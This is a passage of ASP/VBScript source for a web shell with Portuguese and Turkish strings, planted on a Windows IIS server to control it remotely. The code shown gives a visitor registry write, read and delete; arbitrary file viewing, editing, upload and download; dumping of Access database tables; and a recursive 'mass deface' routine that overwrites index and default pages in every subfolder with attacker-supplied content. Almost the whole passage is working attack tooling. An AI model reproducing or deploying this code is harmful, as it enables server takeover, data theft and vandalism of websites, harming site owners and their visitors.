515.                                                             teste = WshShell.RegWrite (Trim(Request.QueryString("key")), Trim(Request.QueryString("value")), "REG_SZ")
516.                                                     Case "2"
517.                                                             teste = WshShell.RegWrite (Trim(Request.QueryString("key")), CInt(Trim(Request.QueryString("value"))), "REG_DWORD")
518.                                                     Case "3"
519.                                                             teste = WshShell.RegWrite (Trim(Request.QueryString("key")), CInt(Trim(Request.QueryString("value"))), "REG_BINARY")
520.                                                     Case "4"
521.                                                             teste = WshShell.RegWrite (Trim(Request.QueryString("key")), Trim(Request.QueryString("value")), "REG_EXPAND_SZ")
522.                                                     Case "5"
523.                                                             teste = WshShell.RegWrite (Trim(Request.QueryString("key")), Trim(Request.QueryString("value")), "REG_MULTI_SZ")
524.                                             End Select
525.                                             Response.Write "<center><br><font face=""arial"" size=""2"">Registry <b>"
526.                                             Response.Write Trim(Request.QueryString("key")) & "</b> Changed.</center>"
527.                                             Response.Write "<br><br><font face=""arial"" size=""1""><a href=""" & Request.ServerVariables("SCRIPT_NAME") & "?action=reg"">Main Menu</a><br>"
528.                                     Else
529.                                             Response.Write "<table><tr><td><font face=""arial"" size=""2"">ROOT KEY NAME</td><td><font face=""arial"" size=""2"">ABREVIAC?O</td></tr>"
530.                                             Response.Write "<tr><td><font face=""arial"" size=""1"">HKEY_CURRENT_USER </td><td><font face=""arial"" size=""1""> HKCU </td></tr>"
531.                                             Response.Write "<tr><td><font face=""arial"" size=""1"">HKEY_LOCAL_MACHINE </td><td><font face=""arial"" size=""1""> HKLM </td></tr>"
532.                                             Response.Write "<tr><td><font face=""arial"" size=""1"">HKEY_CLASSES_ROOT </td><td><font face=""arial"" size=""1""> HKCR </td></tr>"
533.                                             Response.Write "<tr><td><font face=""arial"" size=""1"">HKEY_USERS </td><td><font face=""arial"" size=""1""> HKEY_USERS </td></tr>"
534.                                             Response.Write "<tr><td><font face=""arial"" size=""1"">HKEY_CURRENT_CONFIG </td><td><font face=""arial"" size=""1""> HKEY_CURRENT_CONFIG </td></tr></table><br>"
535.                                             Response.Write "<table><tr><td><font face=""arial"" size=""2"">Type </td><td><font face=""arial"" size=""2""> Description </td><td><font face=""arial"" size=""2""> Figure </td></tr>"
536.                                             Response.Write "<tr><td><font face=""arial"" size=""1"">REG_SZ </td><td><font face=""arial"" size=""1""> String </td><td><font face=""arial"" size=""1""> String </td></tr>"
537.                                             Response.Write "<tr><td><font face=""arial"" size=""1"">REG_DWORD </td><td><font face=""arial"" size=""1""> Number </td><td><font face=""arial"" size=""1""> DWORD </td></tr>"
538.                                             Response.Write "<tr><td><font face=""arial"" size=""1"">REG_BINARY </td><td><font face=""arial"" size=""1""> Binary </td><td><font face=""arial"" size=""1""> VBArray DWORD </td></tr>"
539.                                             Response.Write "<tr><td><font face=""arial"" size=""1"">REG_EXPAND_SZ </td><td><font face=""arial"" size=""1""> String Expand (ex. ""%windir%\\calc.exe"") </td><td><font face=""arial"" size=""1""> String </td></tr>"
540.                                             Response.Write "<tr><td><font face=""arial"" size=""1"">REG_MULTI_SZ </td><td><font face=""arial"" size=""1""> Array Of Strings </td><td><font face=""arial"" size=""1""> VBArray Of Strings </td></tr></table>"
541.                                             Response.Write "<br><br><FORM action=""" & Request.ServerVariables("URL") & """ method=""GET"">"
542.                                             Response.Write "<table><tr><td><font face=""arial"" size=""1"">KEY: </td><td><input type=""text"" name=""key""> <font face=""arial"" size=""1""><br>( ex.: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\ProductId )</td></tr>"
543.                                             Response.Write "<tr><td><font face=""arial"" size=""1"">VALUE:</td><td><input type=""text"" name=""value""></td></tr>"
544.                                             Response.Write "<tr><td><font face=""arial"" size=""1"">TYPE:</td><td><SELECT NAME=""type"">"
545.                                             Response.Write "<OPTION VALUE=""1"">REG_SZ </option>"
546.                                             Response.Write "<OPTION VALUE=""2"">REG_DWORD </option>"
547.                                             Response.Write "<OPTION VALUE=""3"">REG_BINARY </option>"
548.                                             Response.Write "<OPTION VALUE=""4"">REG_EXPAND_SZ </option>"
549.                                             Response.Write "<OPTION VALUE=""5"">REG_MULTI_SZ </option></select><br>"
550.                                             Response.Write "<input type=""hidden"" name=""regaction"" value=""w"">"
551.                                             Response.Write "<input type=""hidden"" name=""action"" value=""reg"">"
552.                                             Response.Write "<input type=""hidden"" name=""process"" value=""yes""></td></tr>"
553.                                             Response.Write "<tr><td></td><td><input type=""submit"" value=""OK""></form></td></tr></table>"
554.                                             Response.Write "<br><br><font face=""arial"" size=""1""><a href=""" & Request.ServerVariables("SCRIPT_NAME") & "?action=reg"">Main Menu</a><br>"
555.                                     End If
556.                             Case "r"
557.                                     If Trim(Request.QueryString("process")) = "yes" Then
558.                                             Response.Write "<font face=""arial"" size=""2"">" & Trim(Request.QueryString("key")) & "<br>"
559.                                             Response.Write "Value: <b>" & WshShell.RegRead (Trim(Request.QueryString("key")))
560.                                     Else
561.                                             Response.Write "<FORM action=""" & Request.ServerVariables("URL") & """ method=""GET"">"
562.                                             Response.Write "<font face=""arial"" size=""1"">KEY: <input type=""text"" name=""key""> <br>( ex.: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\ProductId )<br>"
563.                                             Response.Write "<input type=""hidden"" name=""regaction"" value=""r"">"
564.                                             Response.Write "<input type=""hidden"" name=""action"" value=""reg"">"
565.                                             Response.Write "<input type=""hidden"" name=""process"" value=""yes"">"
566.                                             Response.Write "<input type=""submit"" value=""OK""></form>"
567.                                     End If
568.                                     Response.Write "<br><br><font face=""arial"" size=""1""><a href=""" & Request.ServerVariables("SCRIPT_NAME") & "?action=reg"">Main Menu</a><br>"
569.                             Case "d"
570.                                     If Trim(Request.QueryString("process")) = "yes" Then
571.                                             teste = WshShell.RegDelete (Trim(Request.QueryString("key")))
572.                                             Response.Write "Chave <b>" & Trim(Request.QueryString("key")) & " </b>Deleted."
573.                                     Else
574.                                             Response.Write "<FORM action=""" & Request.ServerVariables("URL") & """ method=""GET"">"
575.                                             Response.Write "<font face=""arial"" size=""1"">KEY: <input type=""text"" name=""key""> ( ex.: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\ProductId )<br>"
576.                                             Response.Write "<input type=""hidden"" name=""regaction"" value=""d"">"
577.                                             Response.Write "<input type=""hidden"" name=""action"" value=""reg"">"
578.                                             Response.Write "<input type=""hidden"" name=""process"" value=""yes"">"
579.                                             Response.Write "<input type=""submit"" value=""OK""></form>"
580.                                     End If
581.                                     Response.Write "<br><br><font face=""arial"" size=""1""><a href=""" & Request.ServerVariables("SCRIPT_NAME") & "?action=reg"">Main Menu</a><br>"
582.                             Case Else
583.                                     Response.Write "<font face=""arial"" size=""1""><a href=""" & Request.ServerVariables("SCRIPT_NAME") & "?action=reg&regaction=w"">WRITE VALUE</a><br><br>"
584.                                     Response.Write "<a href=""" & Request.ServerVariables("SCRIPT_NAME") & "?action=reg&regaction=r"">READ VALUE</a><br><br>"
585.                                     Response.Write "<a href=""" & Request.ServerVariables("SCRIPT_NAME") & "?action=reg&regaction=d"">DELETE KEY</a><br>"
586.                     End Select
587.                     Set WshShell = Nothing
588.             Case "txtview"
589.                     checa = checking(cprthtml,keydec)
590.                     Call hdr()
591.                     Response.Write copyright & onlinehelp & "<font face=""arial"" size=""2"">"
592.                     file = Replace(Trim(Request.QueryString("file")),"|","\")
593.                     Set fso = CreateObject("Scripting.FileSystemObject")  
594.                     Set a = fso.OpenTextFile(file)
595.                     Response.Write Replace(Replace(Server.HTMLEncode(a.ReadAll),VbCrLf,"<br>")," ","&nbsp;")
596.                     Set a = Nothing
597.                     Set fso = Nothing
598.             Case "txtedit"
599.                     checa = checking(cprthtml,keydec)
600.                     Call hdr()
601.                     Response.Write copyright & onlinehelp
602.                     If Request.Form.Count = 0 Then
603.                             file = Replace(Trim(Request.QueryString("file")),"|","\")
604.                             Set fso = CreateObject("Scripting.FileSystemObject")
605.                             Set a = fso.OpenTextFile(file)
606.                             Response.Write "<form method=""post"" action=""" & Request.ServerVariables("SCRIPT_NAME") & "?action=txtedit"">"
607.                             Response.Write "<textarea cols='85' rows='25' name=""content"" wrap=""physical"" >" & Server.HTMLEncode(a.ReadAll) & "</textarea><br>"
608.                             Response.Write "<input type=""hidden"" name=""path"" value=""" & Trim(Request.QueryString("file")) & """>"
609.                             Response.Write "<input type=""submit"" name=""savemethod"" value=""Save"">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<input type=""submit"" name=""savemethod"" value=""Save as""></form>"
610.                             Set a = Nothing
611.                             Set fso = Nothing
612.                     Else
613.                             Select Case Trim(Request.Form("savemethod"))
614.                                     Case "Save"
615.                                             Set fso = CreateObject("Scripting.FileSystemObject")
616.                                             novotexto = Trim(Request.Form("content"))
617.                                             novotexto = Split(novotexto,vbCrLf)
618.                                             Set objstream = fso.OpenTextFile(Replace(Trim(Request.Form("path")),"|","\"),2)
619.                                             For i = 0 To UBound(novotexto)
620.                                                     objstream.WriteLine(novotexto(i))
621.                                             Next
622.                                             objstream.Close
623.                                             Set objstream = Nothing
624.                                             Response.Write "Texto salvo: <b>" & Replace(Trim(Request.Form("path")),"|","\") & "</b>"
625.                                     Case "Save as"
626.                                             Set fso = CreateObject("Scripting.FileSystemObject")
627.                                             novotexto = Trim(Request.Form("content"))
628.                                             novotexto = Split(novotexto,vbCrLf)
629.                                             caminho = showobjpath(Replace(Trim(Request.Form("path")),"|","\")) & "rhtemptxt.txt"
630.                                             Set objstream = fso.CreateTextFile(caminho,true,false)
631.                                             For i = 0 To UBound(novotexto)
632.                                                     objstream.WriteLine(novotexto(i))
633.                                             Next
634.                                             objstream.Close
635.                                             Set objstream = Nothing
636.                                             Response.Write "<form method=""post"" action=""" & Request.ServerVariables("SCRIPT_NAME") & "?action=txtedit"">"
637.                                             Response.Write "<input type=""text"" name=""filename"" value=""" & showobj(Replace(Trim(Request.Form("path")),"|","\")) & """><br>"
638.                                             Response.Write "<input type=""hidden"" name=""path"" value=""" & Trim(Request.Form("path")) & """>"
639.                                             Response.Write "<input type=""submit"" name=""savemethod2"" value=""Save""></form>"
640.                                     Case Else
641.                                             caminho = showobjpath(Replace(Trim(Request.Form("path")),"|","\")) & "rhtemptxt.txt"
642.                                             Set ObjFSO = CreateObject("Scripting.FileSystemObject")
643.                                             Set MyFile = ObjFSO.GetFile(caminho)
644.                                             destino = Left(caminho,InStrRev(caminho,"\")) & Trim(Request.Form("filename"))
645.                                             MyFile.Move (destino)
646.                                             If Err.Number = 0 Then
647.                                                     Response.Write "<font face='arial' size='2'><center><br><br>Arquivo: <b>" & destino & "</b> salvo!"
648.                                                     Response.Write "<SCRIPT LANGUAGE=""JavaScript"">self.opener.document.location.reload();</SCRIPT>"
649.                                             End If
650.                             End Select
651.                     End If
652.             Case "download"
653.                     Response.Buffer = True
654.                     Response.Clear
655.                     strFileName = Replace(Trim(Request.QueryString("file")),"|","\")
656.                     strFile = Right(strFileName, Len(strFileName) - InStrRev(strFileName,"\"))
657.                     strFileType = Request.QueryString("type")
658.                     if strFileType = "" then strFileType = "application/download"
659.                     Set fso = Server.CreateObject("Scripting.FileSystemObject")
660.                     Set f = fso.GetFile(strFilename)
661.                     intFilelength = f.size
662.                     Set f = Nothing
663.                     Set fso = Nothing
664.                     Response.AddHeader "Content-Disposition", "attachment; filename=" & strFile
665.                     Response.AddHeader "Content-Length", intFilelength
666.                     Response.Charset = "UTF-8"
667.                     Response.ContentType = strFileType
668.                     Set Stream = Server.CreateObject("ADODB.Stream")
669.                     Stream.Open
670.                     Stream.type = 1
671.                     Stream.LoadFromFile strFileName
672.                     Response.BinaryWrite Stream.Read
673.                     Response.Flush
674.                     Stream.Close
675.                     Set Stream = Nothing
676.             Case "upload"
677.                     If Request.QueryString("processupload") <> "yes" Then
678.                             Response.Write "<FORM METHOD=""POST"" ENCTYPE=""multipart/form-data"" ACTION=""" & Request.ServerVariables("SCRIPT_NAME") & "?action=upload&processupload=yes&path=" & Request.QueryString("path") & """>"
679.                             Response.Write "<TABLE BORDER=0>"
680.                             Response.Write "<tr><td><font face=""arial"" size=""2""><b>Select a file to upload:</b><br><INPUT TYPE=FILE SIZE=50 NAME=""FILE1""></td></tr>"
681.                             Response.Write "<tr><td align=""center""><font face=""arial"" size=""2""><INPUT TYPE=SUBMIT VALUE=""Upload!""></td></tr>"
682.                             Response.Write "</TABLE>"
683.                     Else
684.                             Set Uploader = New FileUploader
685.                             Uploader.Upload()
686.                             If Uploader.Files.Count = 0 Then
687.                                     Response.Write "File(s) not uploaded."
688.                             Else
689.                                     For Each File In Uploader.Files.Items
690.                                             File.SaveToDisk Replace(Trim(Request.QueryString("path")),"|","\")
691.                                             Response.Write "File Uploaded: " & File.FileName & "<br>"
692.                                             Response.Write "Size: " & File.FileSize & " bytes<br>"
693.                                             Response.Write "Type: " & File.ContentType & "<br><br>"
694.                                             Response.Write "<SCRIPT LANGUAGE=""JavaScript"">self.opener.document.location.reload();</SCRIPT>"
695.                                     Next
696.                             End If
697.                     End If
698.             Case "mass"
699.                     checa = checking(cprthtml,keydec)
700.                     Call hdr()
701.                     Response.Write copyright & onlinehelp
702.                     Sub themassdeface(caminhodomass,metodo,ObjFSO,MeuArquivo)
703.                             On Error Resume Next
704.                             Set MonRep = ObjFSO.GetFolder(caminhodomass)
705.                             Set ColFolders = MonRep.SubFolders
706.                             for each folderItem in ColFolders
707.                                     destino1 = folderItem.path & "\index.htm"
708.                                     destino2 = folderItem.path & "\index.html"
709.                                     destino3 = folderItem.path & "\index.asp"
710.                                     destino4 = folderItem.path & "\index.cfm"
711.                                     destino5 = folderItem.path & "\index.php"
712.                                     destino6 = folderItem.path & "\default.htm"
713.                                     destino7 = folderItem.path & "\default.html"
714.                                     destino8 = folderItem.path & "\default.asp"
715.                                     destino9 = folderItem.path & "\default.cfm"
716.                                     destino10 = folderItem.path & "\default.php"
717.                                     MeuArquivo.Copy(destino1)
718.                                     MeuArquivo.Copy(destino2)
719.                                     MeuArquivo.Copy(destino3)
720.                                     MeuArquivo.Copy(destino4)
721.                                     MeuArquivo.Copy(destino5)
722.                                     MeuArquivo.Copy(destino6)
723.                                     MeuArquivo.Copy(destino7)
724.                                     MeuArquivo.Copy(destino8)
725.                                     MeuArquivo.Copy(destino9)
726.                                     MeuArquivo.Copy(destino10)
727.                                     Response.Write "<table><tr><td><font face='arial' size='2'>&lt;DIR&gt; " & folderItem.path & "</td>"
728.                                     If Err.Number = 0 Then
729.                                             Response.Write "<td valign='baseline'>&nbsp;&nbsp;<font face='arial' size='2' color='green'>DONE!</font></td></tr>"
730.                                     Else
731.                                             Response.Write "<td valign='baseline'>&nbsp;&nbsp;<font face='arial' size='2' color='red'>" & UCase(Err.Description) & "</font></td></tr></table>"
732.                                     End If
733.                                     Err.Number = 0
734.                                     Response.Flush
735.                                     If metodo = "brute" Then
736.                                             Call themassdeface(folderItem.path & "\","brute",ObjFSO,MeuArquivo)
737.                                     End If
738.                             next
739.                     End Sub
740.                     Sub brutemass(caminho,massaction)
741.                             If massaction = "test" Then
742.                                     On Error Resume Next
743.                                     Set MonRep = ObjFSO.GetFolder(caminho)
744.                                     Set ColFolders = MonRep.SubFolders
745.                                     Set ColFiles0 = MonRep.Files
746.                                     for each folderItem in ColFolders
747.                                             Set TotalFolders = ObjFSO.GetFolder(folderItem.path)
748.                                             Set EachFolder = TotalFolders.SubFolders
749.                                             Response.Write "<table border=""0"" cellspacing=""0"" cellpadding=""0"" >"
750.                                             maindestino = folderItem.path & "\"
751.                                             MeuArquivo.Copy(maindestino)
752.                                             Response.Write "<tr><td><b><font face='arial' size='2'>&lt;DIR&gt; " & maindestino & "</b></td>"
753.                                             If Err.Number = 0 Then
754.                                                     Response.Write "<td valign='baseline'>&nbsp;&nbsp;<font face='arial' size='2' color='green'>Acesso Permitido</font></td></tr>"
755.                                             Else
756.                                                     Response.Write "<td valign='baseline'>&nbsp;&nbsp;<font face='arial' size='2' color='red'>" & UCase(Err.Description) & "</font></td></tr>"
757.                                             End If
758.                                             Err.Number = 0
759.                                             Response.Flush
760.                                             If EachFolder.count > 0 Then
761.                                                     masscontador = 0
762.                                                     for each subpasta in EachFolder
763.                                                             masscontador = masscontador + 1
764.                                                             destino = subpasta.path & "\"
765.                                                             If masscontador = 1 Then
766.                                                                     destinofinal = destino
767.                                                                     pathfinal = subpasta.path
768.                                                                     Err.Number = 0
769.                                                                     MeuArquivo.Copy(destinofinal)
770.                                                                     Response.Write "<tr><td><font face='arial' size='2'>&lt;DIR&gt; " & showobj(pathfinal) & "</td>"
771.                                                                     If Err.Number = 0 Then
772.                                                                             Response.Write "<td valign='baseline'>&nbsp;&nbsp;<font face='arial' size='2' color='green'>Acesso Permitido</font></td></tr>"
773.                                                                     Else
774.                                                                             Response.Write "<td valign='baseline'>&nbsp;&nbsp;<font face='arial' size='2' color='red'>" & UCase(Err.Description) & "</font></td></tr>"
775.                                                                     End If
776.                                                                     Err.Number = 0
777.                                                                     Response.Flush
778.                                                             Else
779.                                                                     MeuArquivo.Copy(destino)
780.                                                                     Response.Write "<tr><td><font face='arial' size='2'>&lt;DIR&gt; " & showobj(subpasta.path) & "</td>"
781.                                                                     If Err.Number = 0 Then
782.                                                                             Response.Write "<td valign='baseline'>&nbsp;&nbsp;<font face='arial' size='2' color='green'>Acesso Permitido</font></td></tr>"
783.                                                                     Else
784.                                                                             Response.Write "<td valign='baseline'>&nbsp;&nbsp;<font face='arial' size='2' color='red'>" & UCase(Err.Description) & "</font></td></tr>"
785.                                                                     End If
786.                                                                     Err.Number = 0
787.                                                                     Response.Flush
788.                                                             End If
789.                                                     next
790.                                                     masscontador = 0
791.                                             End If
792.                                             Response.Write "</table><br>"
793.                                             Call brutemass(folderItem.path & "\","test")
794.                                     next
795.                                     Set MonRep = Nothing
796.                                     Set ColFolders = Nothing
797.                                     Set ColFiles0 = Nothing
798.                             Else
799.                                     If Request.Form.Count = 0 Then
800.                                             Response.Write "<font face=""arial"" size=""2""><br><br><b>Brute:</b> Test and Deface root and sub directories.<br><br>"
801.                                             Response.Write "<b>Single:</b> Test and deface only root directories.<br><br>"
802.                                             Response.Write "<form method=""post"" action=""" & Request.ServerVariables("SCRIPT_NAME") & "?action=mass&massact=dfc"">"
803.                                             Response.Write "<input type=""hidden"" name=""path"" value=""" & Trim(Request.QueryString("path")) & """>"
804.                                             Response.Write "<center><font face=""arial"" size=""2"">Deface Code:<br>"
805.                                             Response.Write "<textarea cols='65' rows='15' name=""content""></textarea><br>"
806.                                             Response.Write "<input type=""radio"" name=""massopt"" value=""brute"" checked>Brute&nbsp;&nbsp;&nbsp;"
807.                                             Response.Write "<input type=""radio"" name=""massopt"" value=""single"">Single<br>"
808.                                             Response.Write "<input type=""submit"" value=""Deface ALL!""></center>"
809.                                             Response.Write "</form>"
810.                                     Else
811.                                             Set ObjFSO = CreateObject("Scripting.FileSystemObject")
812.                                             patharquivotxt = Left(Server.MapPath(Request.ServerVariables("SCRIPT_NAME")),InstrRev(Server.MapPath(Request.ServerVariables("SCRIPT_NAME")),"\"))
813.                                             arquivomassdfc = patharquivotxt & "teste.txt"
814.                                             Set Arquivotxt = ObjFso.OpenTextFile(arquivomassdfc, 2, True, False)
815.                                             vetordelinhas = Split(Request.Form("content"),VbCrLf)
816.                                             For i = 0 To UBound(vetordelinhas)
817.                                                     Arquivotxt.WriteLine(vetordelinhas(i))
818.                                             Next
819.                                             Set MeuArquivo = ObjFSO.GetFile(arquivomassdfc)
820.                                            
821.                                             If Request.Form("massopt") = "single" Then
822.                                                     Call themassdeface(caminho,"single",ObjFSO,MeuArquivo)
823.                                             ElseIf Request.Form("massopt") = "brute" Then
824.                                                     Call themassdeface(caminho,"brute",ObjFSO,MeuArquivo)
825.                                             End If
826.                                     End If
827.                             End If
828.                     End Sub
829.                     If Trim(Request.QueryString("massact")) = "test" Then
830.                             Set ObjFSO = CreateObject("Scripting.FileSystemObject")
831.                             patharquivotxt = Left(Server.MapPath(Request.ServerVariables("SCRIPT_NAME")),InstrRev(Server.MapPath(Request.ServerVariables("SCRIPT_NAME")),"\"))
832.                             arquivo = patharquivotxt & "_vti_cnf.log"
833.                             Set Arquivotxt = ObjFSO.CreateTextFile(arquivo,True)
834.                             Set MeuArquivo = ObjFSO.GetFile(arquivo)
835.                             Call brutemass(Replace(Trim(Request.QueryString("path")),"|","\"),"test")
836.                     ElseIf Trim(Request.QueryString("massact")) = "dfc" Then
837.                             Call brutemass(Replace(Trim(Request.Form("path")),"|","\"),"dfc")
838.                     End If
839.             Case "fcopy"
840.                 If Trim(Request.Form("submit1")) = "Copy" Then
841.                     mptpath=Trim(Request.Form("path"))
842.                     mptdest=Trim(Request.Form("cf"))
843.                     Set ObjFSO = CreateObject("Scripting.FileSystemObject")
844.                     isl = ""
845.                     if Trim(Request.Form("islem"))="kopyala" then
846.                             objFSO.CopyFolder mptpath,mptdest
847.                             isl="Copied.."
848.                     elseif Trim(Request.Form("islem"))="tasi" then
849.                             objFSO.MoveFolder mptpath,mptdest
850.                             isl="moved.."
851.                     end if
852.      
853.                     response.Write "Command: "&isl
854.                     response.Write "<br><font color=red>File From: </font>" & mptpath & "<br><font color=red>Copy to: </font>" & mptdest
855.                     response.Write "<br>"
856.                 Else
857.                     Response.Write "<form method=""post"" action=""" & Request.ServerVariables("SCRIPT_NAME") & "?action=fcopy"">"
858.                     Response.Write "<table cellpadding=0 cellspacing=0 align=center><tr><td width=100><font size=2>Copy Path : </td><td>"
859.                     Response.Write "<input type=hidden value='19' name=status><input type=hidden value='"& Replace(Trim(Request.QueryString("path")),"|","\") &"' name=path><input type=hidden value='"&time&"' name=Time>"
860.                     Response.Write "<input style='width:250; height:21' value='"& Replace(Trim(Request.QueryString("path")) & "\","|","\") &"' name=cf>"
861.                     response.Write "<input type=submit value='Copy' style='height:22;width:70' id=submit1 name=submit1>"
862.                     Response.Write "</td></tr><tr><td colspan=3 align=center><font size=2>"
863.                     response.Write "<input type=radio name='islem' value='kopyala' checked>Copy"
864.                     response.Write "<input type=radio name='islem' value='tasi'>Move"
865.                     response.Write "</table>"
866.                     response.Write "</form>"
867.                 End IF
868.      
869.             Case "filecopy"
870.                 If Trim(Request.Form("submit1")) = "Copy" Then
871.                     mptpath=Trim(Request.Form("path"))
872.                     mptdest=Trim(Request.Form("cf"))
873.                     Set ObjFSO = CreateObject("Scripting.FileSystemObject")
874.                     isl = ""
875.                     if Trim(Request.Form("islem"))="kopyala" then
876.                             objFSO.CopyFile mptpath,mptdest
877.                             isl="Copy.."
878.                     elseif Trim(Request.Form("islem"))="tasi" then
879.                             objFSO.MoveFile mptpath,mptdest
880.                             isl="move.."
881.                     end if
882.      
883.                     response.Write "Command: "&isl
884.                     response.Write "<br><font color=red>File From: </font>" & mptpath & "<br><font color=red>Copy to: </font>" & mptdest
885.                     response.Write "<br>"
886.                 Else
887.                     Response.Write "<form method=""post"" action=""" & Request.ServerVariables("SCRIPT_NAME") & "?action=filecopy"">"
888.                     Response.Write "<table cellpadding=0 cellspacing=0 align=center><tr><td width=100><font size=2>Copy Path : </td><td>"
889.                     Response.Write "<input type=hidden value='19' name=status><input type=hidden value='"& Replace(Trim(Request.QueryString("file")),"|","\") &"' name=path><input type=hidden value='"&time&"' name=Time>"
890.                     Response.Write "<input style='width:250; height:21' value='"& Replace(Trim(Request.QueryString("file")),"|","\") &"' name=cf>"
891.                     response.Write "<input type=submit value='Copy' style='height:22;width:70' id=submit1 name=submit1>"
892.                     Response.Write "</td></tr><tr><td colspan=3 align=center><font size=2>"
893.                     response.Write "<input type=radio name='islem' value='kopyala' checked>Copy"
894.                     response.Write "<input type=radio name='islem' value='tasi'>Move"
895.                     response.Write "</table>"
896.                     response.Write "</form>"
897.                 End IF
898.      
899.      
900.             Case "search"
901.              If (Trim(Request.Form("submit1")) = "Search") xor Trim(Request.QueryString("status"))<>"" Then
902.               showdisks=FALSE
903.               status5=Trim(Request.Form("status"))
904.               if status5="" then status5=Trim(Request.QueryString("status"))
905.                   SELECT CASE status5
906.      
907.                     CASE "5"
908.                             Response.Write "<center><b><font color=orange>"& Trim(Request.QueryString("path")) &"</font></b></center><br>"
909.                             Response.Write "<table width=100% ><tr><td>"
910.                             set f = objFSO.OpenTextFile(Trim(Request.QueryString("path")),1)
911.                             Response.Write "<pre>"&Server.HTMLEncode(f.readAll)&"</pre>"
912.                             if err.number=62 then Response.Write "<script language=javascript>alert('Bu Dosya Okunam?yor\nSistem dosyas?olabilir')</script>":Response.End
913.      
914.      
915.      
916.                      CASE "7":
917.                             Response.Write "<b><font size=3>Tables</font></br><br>"
918.                             Set objConn = Server.CreateObject("ADODB.Connection")
919.                             Set objADOX = Server.CreateObject("ADOX.Catalog")
920.                             objConn.Provider = "Microsoft.Jet.Oledb.4.0"
921.                             objConn.ConnectionString = Trim(Request.QueryString("path"))
922.                             objConn.Open
923.                             objADOX.ActiveConnection = objConn
924.      
925.                             For Each table in objADOX.Tables
926.                                     If table.Type = "TABLE" Then
927.                                             Response.Write "<font face=wingdings size=5>4</font> <a href='"& Request.ServerVariables("SCRIPT_NAME") &"?action=search&status=8&Path="& Trim(Request.QueryString("path")) &"&table="&table.Name&"'>"&table.Name&"</a><br>"
928.                                     End If
929.                             Next
930.      
931.                     CASE "8":
932.                             table=Trim(Request.QueryString("table"))
933.                             Response.Write "<font color=red><h4>Table Name: " & table & "</h4></font><br><Br><br>"
934.                             Set objConn = Server.CreateObject("ADODB.Connection")
935.                             Set objRcs = Server.CreateObject("ADODB.RecordSet")
936.                             objConn.Provider = "Microsoft.Jet.Oledb.4.0"
937.                             objConn.ConnectionString = Trim(Request.QueryString("path"))
938.                             objConn.Open
939.                             objRcs.Open table,objConn, adOpenKeyset , , adCmdText
940.            
941.                             Response.Write "<table border=1 cellpadding=2 cellspacing=0 bordercolor=543152><tr bgcolor=silver>"
942.                             for i=0 to objRcs.Fields.count-1
943.                                     Response.Write "<td><font color=black><b>&nbsp;&nbsp;&nbsp;"&objRcs.Fields(i).Name&"&nbsp;&nbsp;&nbsp;</font></td>"
944.                             next
945.                             Response.Write "</tr>"
946.                             do while not objRcs.EOF
947.                                     Response.Write "<tr>"
948.                                     for i=0 to objRcs.Fields.count-1
949.                                             Response.Write "<td>"&objRcs.Fields(i).Value&"&nbsp;</td>"
950.                                     next
951.                                     Response.Write "</tr>"
952.                                     objRcs.MoveNext
953.                             loop
954.                             Response.Write "</table><br>"
955.      
956.      
957.                      case "12": araBul Trim(Request.Form("path")),Trim(Request.Form("arama"))
958.      
959.                     END SELECT
960.      
961.              Else
962.                     showdisks=FALSE
963.                     checa = checking(cprthtml,keydec)
964.                     Call hdr()
965.                     Response.Write "<form method=""post"" target=""_opener"" action=""" & Request.ServerVariables("SCRIPT_NAME") & "?action=search"">"
966.                     Response.Write "<table widht='100%' border=0 cellpadding=0 cellspacing=0><tr><td width=70><font size=2>File Ext: </td><td>"
967.                     Response.Write "&nbsp;<input type=hidden value='12' name=status>"
968.                     Response.Write "<input type=hidden value=""" & Replace(Trim(Request.QueryString("path")),"|","\") & """ name=""path""><input style='width:250' value='mdb' name='arama'><input style='width:70; height:22' type=submit value='Search' name='submit1'>"
969.                     Response.Write "</td></tr></table></form>"
970.             End IF
971.      
972.      
973.      
974.             Case "sqlserver"
975.              If (Trim(Request.Form("submit1")) = "Execute SQL Server Command") xor Trim(Request.QueryString("status"))<>"" Then
976.               showdisks=FALSE
977.               status5=Trim(Request.Form("status"))
978.               if status5="" then status5=Trim(Request.QueryString("status"))
979.                   SELECT CASE status5
980.      
981.      
982.                      CASE "7":
983.                             Response.Write "<b><font size=3>Tables</font></br><br>"
984.                             Set objConn = Server.CreateObject("ADODB.Connection")
985.                             Set objADOX = Server.CreateObject("ADOX.Catalog")
986.                             objConn.Provider = "Microsoft.Jet.Oledb.4.0"
987.                             objConn.ConnectionString = Trim(Request.QueryString("path"))
988.                             objConn.Open
989.                             objADOX.ActiveConnection = objConn
990.      
991.                             For Each table in objADOX.Tables
992.                                     If table.Type = "TABLE" Then
993.                                             Response.Write "<font face=wingdings size=5>4</font> <a href='"& Request.ServerVariables("SCRIPT_NAME") &"?action=search&status=8&Path="& Trim(Request.QueryString("path")) &"&table="&table.Name&"'>"&table.Name&"</a><br>"
994.                                     End If
995.                             Next
996.      
997.                     CASE "8":
998.                             table=Trim(Request.QueryString("table"))
999.                             Response.Write "<font color=red><h4>Table Name: " & table & "</h4></font><br><Br><br>"
1000.                             Set objConn = Server.CreateObject("ADODB.Connection")
1001.                             Set objRcs = Server.CreateObject("ADODB.RecordSet")
1002.                             objConn.Provider = "Microsoft.Jet.Oledb.4.0"
1003.                             objConn.ConnectionString = Trim(Request.QueryString("path"))
1004.                             objConn.Open
1005.                             objRcs.Open table,objConn, adOpenKeyset , , adCmdText
1006.            
1007.                             Response.Write "<table border=1 cellpadding=2 cellspacing=0 bordercolor=543152><tr bgcolor=silver>"
1008.                             for i=0 to objRcs.Fields.count-1
1009.                                     Response.Write "<td><font color=black><b>&nbsp;&nbsp;&nbsp;"&objRcs.Fields(i).Name&"&nbsp;&nbsp;&nbsp;</font></td>"
1010.                             next
1011.                             Response.Write "</tr>"
1012.                             do while not objRcs.EOF
1013.                                     Response.Write "<tr>"
1014.                                     for i=0 to objRcs.Fields.count-1
1015.                                             Response.Write "<td>"&objRcs.Fields(i).Value&"&nbsp;</td>"
1016.                                     next
1017.                                     Response.Write "</tr>"
1018.                                     objRcs.MoveNext
1019.                             loop
1020.                             Response.Write "</table><br>"
1021.      
1022.      
1023.                   END SELECT
1024.      
1025.              Else
1026.                     showdisks=FALSE
1027.                     checa = checking(cprthtml,keydec)
1028.                     Call hdr()
1029.      
